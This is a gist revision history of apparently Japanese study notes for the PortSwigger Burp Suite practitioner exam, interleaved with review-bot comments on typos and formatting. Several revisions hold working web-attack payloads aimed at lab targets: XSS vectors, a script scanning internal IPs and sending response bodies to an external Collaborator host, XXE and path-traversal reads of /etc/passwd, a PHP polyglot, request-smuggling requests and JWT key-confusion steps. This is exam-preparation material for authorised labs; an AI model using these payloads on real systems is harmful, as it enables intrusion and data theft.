Revisions
wonda-tea-coffee revised this gist
Sep 23, 2022. 1 changed file with 1 addition and 1 deletion.
@@ -743,7 +743,7 @@ Host: 0afb00df04e0e634c0659e2400310083.web-security-academy.net - キャッシュキーの特定 - Pragma: x-get-cache-key(for Akamai) - Varyヘッダ - クエリパラメータutm_content(utm_source, utm_medium)はキャッシュキーから除外されたり、レスポンスに反映されるかもしれない - キャッシュサーバーとバックエンドサーバーのクエリパラメータの解釈に相違がある - バックエンドサーバーのみが;をセパレーターとして解釈する場合 - /js/geolocate.js?callback=setCountryCookie&utm_content=1;callback=alert(1)
wonda-tea-coffee revised this gist
Sep 11, 2022. No changes.
wonda-tea-coffee revised this gist
Sep 11, 2022. 1 changed file with 7 additions and 0 deletions.
@@ -123,6 +123,13 @@ window.onload = (e) => {/* 何か */}; - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる - formがある画面の場合、form内の値をクエリパラメータから受け付けているかもしれない - ユーザーに目当ての要素を選択させる必要があり、任意のURLを踏ませられる場合は以下のようなコードが有効な場合がある ```html <script> location = "target.com?x=<input onfocus=alert(1) id=x>#x" </script> ``` - DOM clobbering - https://portswigger.net/web-security/dom-based/dom-clobbering
wonda-tea-coffee revised this gist
Sep 10, 2022. 1 changed file with 3 additions and 0 deletions.
@@ -124,6 +124,9 @@ window.onload = (e) => {/* 何か */}; - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる - formがある画面の場合、form内の値をクエリパラメータから受け付けているかもしれない - DOM clobbering - https://portswigger.net/web-security/dom-based/dom-clobbering ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet - https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
wonda-tea-coffee revised this gist
Sep 10, 2022. 1 changed file with 8 additions and 0 deletions.
@@ -34,6 +34,11 @@ - HTMLの属性はダブルクォートで囲うこと - シングルクォートで囲ってもレンダリング時にダブルクォートに変換される - 特定のパスでリダイレクトを起こせるか - Ascii to String ```ruby %w(51 101 48 103 104 104 103 101 122 57 119 99 121 56 101 56 98 103 97 111).map(&:to_i).map(&:chr).join ``` ### Find more - https://portswigger.net/web-security/reference/obfuscating-attacks-using-encodings @@ -202,6 +207,9 @@ for (let i = 0; i < 256; i++) { - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection - content-manager:C0nt3ntM4n4g3rでログインできる ### Find more - https://portswigger.net/web-security/server-side-template-injection ## Information Disclosure - TRACEメソッド - DOM内に怪しいファイルの痕跡(コメントなど)が無いか調べる
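Review bot: the "Ascii to String" Ruby one-liner only works for code points up to 255, because `Integer#chr` with no encoding argument raises RangeError above that; since the label suggests a general decoder, `.map(&:to_i).pack('U*')` would handle any code point and return a UTF-8 string. It would also help to state that the input is a list of decimal (not hex) character codes.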
wonda-tea-coffee revised this gist
Sep 10, 2022. 1 changed file with 1 addition and 1 deletion.
@@ -380,7 +380,7 @@ fetch( - 検証はURLデコードした値を見る - http://evil-host%23@expected-host - リクエストの際は `http://evil-host#@expected-host` と解釈されてevil-hostへリクエストが飛ぶ - Collaborator Everywhere(Burp Extension) - 入れておくだけでリクエストの際にRefererやUser-Agentへのpingbackを検出してくれる - ミステリーラボでのターゲット - http://localhost/admin
wonda-tea-coffee revised this gist
Sep 10, 2022. 1 changed file with 2 additions and 0 deletions.
@@ -380,6 +380,8 @@ fetch( - 検証はURLデコードした値を見る - http://evil-host%23@expected-host - リクエストの際は `http://evil-host#@expected-host` と解釈されてevil-hostへリクエストが飛ぶ - Collaborator Everywhere - 入れておくだけでリクエストの際にRefererやUser-Agentへのpingbackを検出してくれる - ミステリーラボでのターゲット - http://localhost/admin - 192.168.0.0/24
wonda-tea-coffee revised this gist
Sep 10, 2022. 1 changed file with 5 additions and 0 deletions.
@@ -375,6 +375,11 @@ fetch( - HTTP Host header attacksのテクニックを試す - Whitelist bypass - https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt - http://evil-host%2523@expected-host - username:passwordをサポートする場合に使える可能性がある - 検証はURLデコードした値を見る - http://evil-host%23@expected-host - リクエストの際は `http://evil-host#@expected-host` と解釈されてevil-hostへリクエストが飛ぶ - ミステリーラボでのターゲット - http://localhost/admin - 192.168.0.0/24
wonda-tea-coffee revised this gist
Sep 10, 2022. 1 changed file with 3 additions and 1 deletion.
@@ -370,9 +370,11 @@ fetch( ## SSRF - Fuzzing List - https://raw.githubusercontent.com/osamahamad/FUZZING/main/localhost.txt - RefererヘッダにBurp Collabratorサーバのホストを入れてページを巡回する - HTTP Host header attacksのテクニックを試す - Whitelist bypass - https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt - ミステリーラボでのターゲット - http://localhost/admin - 192.168.0.0/24
wonda-tea-coffee revised this gist
Sep 9, 2022. 1 changed file with 1 addition and 1 deletion.
@@ -350,7 +350,7 @@ fetch( ### ローカルDTDの再利用 ```xml <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity '
wonda-tea-coffee revised this gist
Sep 9, 2022. 1 changed file with 17 additions and 0 deletions.
@@ -348,6 +348,23 @@ fetch( <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY [xxe](https://portswigger.net/web-security/xxe) SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg> ``` ### ローカルDTDの再利用 ``` <!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity ' <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; '> %local_dtd; ]> ``` - [ローカルファイルの探索とファイルごとのペイロード](https://github.com/GoSecure/dtd-finder) ### Other resources - https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
wonda-tea-coffee revised this gist
Sep 9, 2022. 1 changed file with 1 addition and 0 deletions.
@@ -117,6 +117,7 @@ window.onload = (e) => {/* 何か */}; ``` - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる - formがある画面の場合、form内の値をクエリパラメータから受け付けているかもしれない ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
wonda-tea-coffee revised this gist
Sep 9, 2022. 1 changed file with 14 additions and 0 deletions.
@@ -172,6 +172,20 @@ fetch(`https://LAB/accountDetails`, { <iframe src=https://your-lab-id.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'> ``` - 内部IPのブルートフォース ```html <script> const BURP_HOST = '5qwkaad5lhyov1p42rppclhwnntdh2.oastify.com' for (let i = 0; i < 256; i++) { fetch(`http://192.168.0.${i}:8080`) .then(res => { res.text().then(text => { fetch(`http://${BURP_HOST}?q=${i}&body=${encodeURIComponent(text)}`) })}) } </script> ``` ## OS Command Injection - &, ||, ;などを使ってコマンドに割り込む - 上記の記号を入れてエラーが起きるか
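Review bot: `BURP_HOST` is set to a concrete `*.oastify.com` value, which is a per-session Collaborator domain that will be dead for any other reader; the iframe snippet in the same hunk already uses the placeholder `your-lab-id`, so use a placeholder of the same kind here and say in the bullet that it has to be replaced with the reader's own Collaborator payload.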
wonda-tea-coffee revised this gist
Sep 9, 2022. No changes.
wonda-tea-coffee revised this gist
Sep 8, 2022. 1 changed file with 2 additions and 0 deletions.
@@ -40,6 +40,8 @@ ## Burpテクニック - Repeaterでは複数リクエストをグルーピングして単一コネクションで順にリクエストを送信できる - 手動テストtips - https://portswigger.net/web-security/reference/augmenting-your-manual-testing-with-burp-scanner ## SQL Injection - `foo' OR 1=1 --` ですべてのレコードを取得する
wonda-tea-coffee revised this gist
Sep 8, 2022. 1 changed file with 2 additions and 0 deletions.
@@ -35,6 +35,8 @@ - シングルクォートで囲ってもレンダリング時にダブルクォートに変換される - 特定のパスでリダイレクトを起こせるか ### Find more - https://portswigger.net/web-security/reference/obfuscating-attacks-using-encodings ## Burpテクニック - Repeaterでは複数リクエストをグルーピングして単一コネクションで順にリクエストを送信できる
wonda-tea-coffee revised this gist
Sep 8, 2022. 1 changed file with 27 additions and 0 deletions.
@@ -375,6 +375,33 @@ AddType application/x-httpd-php .hoge exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" -o polyglot.php [元になる画像ファイル] ``` - race condition ```python def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,) request1 = '''<YOUR-POST-REQUEST>''' request2 = '''<YOUR-GET-REQUEST>''' # the 'gate' argument blocks the final byte of each request until openGate is invoked engine.queue(request1, gate='race1') for x in range(5): engine.queue(request2, gate='race1') # wait until every 'race1' tagged request is ready # then send the final byte of each request # (this method is non-blocking, just like queue) engine.openGate('race1') engine.complete(timeout=60) def handleResponse(req, interesting): table.add(req) ``` ### 参考 - https://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html
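Review bot: the "race condition" block is a Turbo Intruder script, but the bullet does not say so; `RequestEngine`, `table`, and the `queueRequests`/`handleResponse` callbacks are names the Burp extension injects, so the snippet is not runnable as plain Python and the surrounding text should name the tool. Minor style point: `for x in range(5)` never uses `x`, so `_` would be the idiomatic loop variable, and the trailing comma in `concurrentConnections=10,)` looks like a leftover from a removed argument.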
wonda-tea-coffee revised this gist
Sep 8, 2022. 1 changed file with 2 additions and 0 deletions.
@@ -757,6 +757,8 @@ location = `${oauth_server}/auth?client_id=${client_id}&redirect_uri=${exploit_s - algヘッダーをHS256に変える - 後はお好きに - RSA公開鍵をシークレットとしてHS256アルゴリズムを使用してトークンに署名 - 公開鍵が利用できない場合、生成した2つのJWTから公開鍵を割り出せることがある - `docker run --rm -it portswigger/sig2n <token1> <token2>` ## Apache - /files/server-status
wonda-tea-coffee revised this gist
Sep 8, 2022. 1 changed file with 17 additions and 0 deletions.
@@ -740,6 +740,23 @@ location = `${oauth_server}/auth?client_id=${client_id}&redirect_uri=${exploit_s - `AA==`をBase64エンコード済みの秘密鍵とする - JWTの作成はjwt.ioが便利 - [jwt.io](https://jwt.io/) - Algorithm confusion - 実装者はRS256を仮定しているのに、ライブラリはヘッダーを見てRS256とHS256のどちらも受け入れる場合に起こる - 悪用の流れ - ※X.509 PEM形式のキーが攻撃対象のサーバに保存されていると仮定) - `/jwks.json` または `/.well-known/jwks.json` でjwkを入手 - 公開鍵を適切なフォーマットに変換 - 1. 公開鍵をコピーしてJWT Editor Keysタブへ - 2. New RSA Keyを押してjwkキーを貼り付ける - 3. ラジオボタンPEMを押してPEMに変換 - 4. PEMをBase64エンコードしてコピー - 5. JWT Editor Keysタブに 戻り、New Symmetric Keyを選択 - 6. ダイアログボックスで生成をクリックして、JWK形式で新しいキーを生成 - 7. kパラメータの値を4でコピーした値で置き換える - JWTを変更する - algヘッダーをHS256に変える - 後はお好きに - RSA公開鍵をシークレットとしてHS256アルゴリズムを使用してトークンに署名 ## Apache - /files/server-status
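Review bot: the assumption line `※X.509 PEM形式のキーが攻撃対象のサーバに保存されていると仮定)` closes a parenthesis that is never opened; either add the opening `(` or drop the `)`. The sub-steps are written as `- 1.`, `- 2.`, ..., which Markdown renders as bullets whose text starts with a number rather than as an ordered list; dropping the leading `-` gives a real numbered list, which matters because step 7 refers back to "4". The "JWT Editor Keys" steps are Burp JWT Editor extension UI actions and the text should say so.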
wonda-tea-coffee revised this gist
Sep 8, 2022. 1 changed file with 4 additions and 0 deletions.
@@ -363,6 +363,7 @@ AddType application/x-httpd-php .hoge - 拡張子 - 大文字、小文字を混ぜる - 複数付ける - ex. shell.php.test - .を(ダブル)URLエンコード - 前にセミコロンやヌルバイト - マルチバイトなユニコード文字 @@ -374,6 +375,9 @@ AddType application/x-httpd-php .hoge exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" -o polyglot.php [元になる画像ファイル] ``` ### 参考 - https://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html ## Access control vulnerabilities - クエリパラメータ、メッセージボディ、HTTPメソッド、ヘッダー(ex. リファラ)、クッキーを書き換える - POSTXなど未知のメソッドを試す
wonda-tea-coffee revised this gist
Sep 8, 2022. 1 changed file with 1 addition and 1 deletion.
@@ -649,7 +649,7 @@ Host: 0afb00df04e0e634c0659e2400310083.web-security-academy.net - キャッシュキーの特定 - Pragma: x-get-cache-key(for Akamai) - Varyヘッダ - クエリパラメータutm_content(utm_source, utm_mediun)はキャッシュキーから除外されたり、レスポンスに反映されるかもしれない - キャッシュサーバーとバックエンドサーバーのクエリパラメータの解釈に相違がある - バックエンドサーバーのみが;をセパレーターとして解釈する場合 - /js/geolocate.js?callback=setCountryCookie&utm_content=1;callback=alert(1)
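Review bot: `utm_mediun` in the query-parameter bullet is a typo for `utm_medium`; since the parameter names are what a reader will look for in a cache key, the spelling should match the real name.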
wonda-tea-coffee revised this gist
Sep 6, 2022. 1 changed file with 1 addition and 0 deletions.
@@ -544,6 +544,7 @@ Host: vulnerable-website.com ``` - https://portswigger.net/web-security/request-smuggling/browser/cl-0 - https://portswigger.net/research/how-to-turn-security-research-into-profit ### H2.TE型
wonda-tea-coffee revised this gist
Sep 5, 2022. 1 changed file with 2 additions and 4 deletions.
@@ -91,10 +91,8 @@ python3 sqlmap.py -u URL_WITH_PARAMS -T TABLE_NAME --dump -o - location.hrefを変えて強制遷移させる - JavaScriptで<>をreplaceしている場合は<>を前に挟む - 正しくはreplaceAll - via SVG - `<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>` - クッキーを盗む ```
wonda-tea-coffee revised this gist
Sep 5, 2022. 1 changed file with 5 additions and 3 deletions.
@@ -116,15 +116,17 @@ window.onload = (e) => {/* 何か */}; - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet - https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting - https://brutelogic.com.br/blog/xss-without-event-handlers/ ### WAF bypass tips - https://www.w3.org/TR/2012/WD-html-markup-20120329/terminology.html#space ## CORS - Originをそのまま信頼しているか ```html <script> fetch(`https://LAB/accountDetails`, {
wonda-tea-coffee revised this gist
Sep 5, 2022. 1 changed file with 2 additions and 0 deletions.
@@ -114,6 +114,8 @@ python3 sqlmap.py -u URL_WITH_PARAMS -T TABLE_NAME --dump -o window.onload = (e) => {/* 何か */}; ``` - aタグが書けるがhref=**がブロックされる場合 `<a href ping="***">` で任意のURLにPOSTリクエストが出せる ### WAF bypass tips - https://www.w3.org/TR/2012/WD-html-markup-20120329/terminology.html#space
wonda-tea-coffee revised this gist
Sep 4, 2022. 1 changed file with 3 additions and 0 deletions.
@@ -114,6 +114,9 @@ python3 sqlmap.py -u URL_WITH_PARAMS -T TABLE_NAME --dump -o window.onload = (e) => {/* 何か */}; ``` ### WAF bypass tips - https://www.w3.org/TR/2012/WD-html-markup-20120329/terminology.html#space ### Further more - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet - https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
wonda-tea-coffee revised this gist
Sep 4, 2022. No changes.
wonda-tea-coffee revised this gist
Sep 4, 2022. 1 changed file with 1 addition and 0 deletions.
@@ -149,6 +149,7 @@ fetch(`https://LAB/accountDetails`, { - ../が削除されるならば....// - 2重URLエンコード - 特定文字列から始まっていれば良いのであれば/var/www/images/../../../etc/passed - `../etc/passwd%00.jpg` ## DOM-based vulnerabilities - web message
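Review bot: the context line `/var/www/images/../../../etc/passed` ends in `passed`, which looks like a typo for `passwd` (the spelling used on the added line directly below); worth correcting so the two bullets refer to the same file.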
wonda-tea-coffee revised this gist
Sep 4, 2022. 1 changed file with 41 additions and 0 deletions.
@@ -508,6 +508,37 @@ x=1 ``` ### CL.0型 リクエストボディを想定していないようなエンドポイントにおいて、HTTPヘッダの終わりをリクエストの終わりと解釈する場合、以下の2つのリクエストをシングルコネクションで連続送信する。 ```req1 POST /vulnerable-endpoint HTTP/1.1 Host: vulnerable-website.com Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 34 GET /admin HTTP/1.1 Foo: x ``` ```req2 GET /anything HTTP/1.1 Host: vulnerable-website.com ``` 結果、バックエンドサーバーでは以下のようなリクエストが届くことがある。 ``` GET /admin HTTP/1.1 Foo: xGET /anything HTTP/1.1 Host: vulnerable-website.com ``` - https://portswigger.net/web-security/request-smuggling/browser/cl-0 ### H2.TE型 HTTP/2においてはContent-Lengthに依らずボディのサイズを算出する仕組みがあるが、これまで同様にTransfer-Encodingを受け入れる場合やはりサーバ間でそれらのHTTPヘッダの解釈差が生まれることがある。 @@ -542,6 +573,16 @@ Content-Length: 5 x=1 ``` ### HTTP/2 request smuggling via CRLF injection - `Foo: bar\r\nTransfer-Encoding: chunked` - https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-smuggling-via-crlf-injection ### HTTP/2 request splitting via CRLF injection - `Foo: bar\r\nGET /admin HTTP/1.1\r\nHost: target` - https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection ### 心得 - バックグランドでスキャナーやエクステンションの類を動かさないこと - リクエスト順によるレスポンスの違いが確かめられなくなる
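Review bot: the two CL.0 fences are tagged ```req1 and ```req2, which are not language names, so the renderer will neither highlight them nor treat them consistently with the untagged result block that follows; tag all three as ```http and put the "req1"/"req2" labels in the prose. The "心得" bullet about not running scanners or extensions in the background is the kind of caveat that belongs at the top of the request-smuggling section rather than at the end, since it applies to every technique above it.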
wonda-tea-coffee revised this gist
Sep 4, 2022. 1 changed file with 37 additions and 1 deletion.
@@ -6,7 +6,7 @@ - ステージ2: アカウントを使用して /admin の管理インターフェイスにアクセスする。おそらく、権限を昇格させるか、管理者アカウントを侵害する。 - ステージ3: 管理インターフェイスを使用して、サーバーのファイルシステムから `/home/carlos/secret` の内容を読み取り、"submit solution" を使用して送信する。 - ユーザー名「 administrator 」を持つ管理者アカウントと、通常は「 carlos 」と呼ばれる権限の低いアカウントが常に存在する。ユーザー名列挙の脆弱性が見つかった場合、次の[ユーザー名リスト](https://portswigger.net/web-security/authentication/auth-lab-usernames)と[パスワードリスト](https://portswigger.net/web-security/authentication/auth-lab-passwords)を使用して、権限の低いアカウントに侵入できる可能性がある。 - 各アプリケーションには最大1人のアクティブユーザーがおり、ユーザーまたは管理者としてログインする。ユーザーは15秒ごとにサイトのホームページにアクセスし、アプリケーションから受信した電子メールのリンクをクリックすると想定できる。エクスプロイトサーバーの「被害者への送信」機能を使用して、反映された脆弱性をターゲットにすることができる。 - SSRFの脆弱性が見つかった場合は、**ローカルホストのポート6566** で実行されている内部専用サービスにアクセスすることで、それを使用してファイルを読み取ることができる。 - _lab および _lab_analytics Cookie は試験のコア機能の一部のため改ざんしてはならない。 - Burp Suiteのプロジェクトファイルを使用する必要がある。プロジェクトファイルは、試験を受けてから1週間以内に証明書を確認したり、報告された問題を調査したりするために要求される場合がある。試験用のプロジェクトで始めると良い。 @@ -33,6 +33,8 @@ - TRACEメソッド - HTMLの属性はダブルクォートで囲うこと - シングルクォートで囲ってもレンダリング時にダブルクォートに変換される - 特定のパスでリダイレクトを起こせるか ## Burpテクニック - Repeaterでは複数リクエストをグルーピングして単一コネクションで順にリクエストを送信できる
@@ -506,6 +508,40 @@ x=1 ``` ### H2.TE型 HTTP/2においてはContent-Lengthに依らずボディのサイズを算出する仕組みがあるが、これまで同様にTransfer-Encodingを受け入れる場合やはりサーバ間でそれらのHTTPヘッダの解釈差が生まれることがある。 例えばフロントサーバはTransfer-Encodingをサポートしておらず、バックエンドサーバーがTransfer-Encodingを優先している場合以下のようにして完全なリクエストを2つ同時に送ることができる。被害者がこのあとアクセスすると404が返り、次に攻撃者がアクセスすると被害者に返されるはずだったレスポンスが見える。このようにしてリクエストのキューを汚染することができる。 ``` POST / HTTP/2 Host: target Transfer-Encoding: chunked 0 GET /xxx HTTP/1.1 Host: target ``` ### H2.CL型 フロントサーバがHTTP/2をダウングレードして、かつ、バックエンドサーバーがContent-Lengthを採用する場合、以下のようにしてエクスプロイトサーバからのレスポンスを返すことができる。 ``` POST / HTTP/2 Host: target Content-Length: 0 GET /something HTTP/1.1 Host: target Content-Length: 5 x=1 ``` ### 心得 - バックグランドでスキャナーやエクステンションの類を動かさないこと - リクエスト順によるレスポンスの違いが確かめられなくなる
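Review bot: the H2.CL paragraph says the technique can return a response from the exploit server, but the request block under it only contains `Host: target` and `GET /something`, so the prose and the example do not match; either reword the sentence to describe what the block actually shows, or document which part of the smuggled request is meant to point elsewhere. In the same hunk, the H2.TE and H2.CL blocks are untagged fences while other sections use ```html / ```python, so ```http would keep the style consistent. The `_lab` / `_lab_analytics` cookie bullet and the "use a Burp project file" bullet are exam-rule caveats rather than techniques and would read better under their own heading.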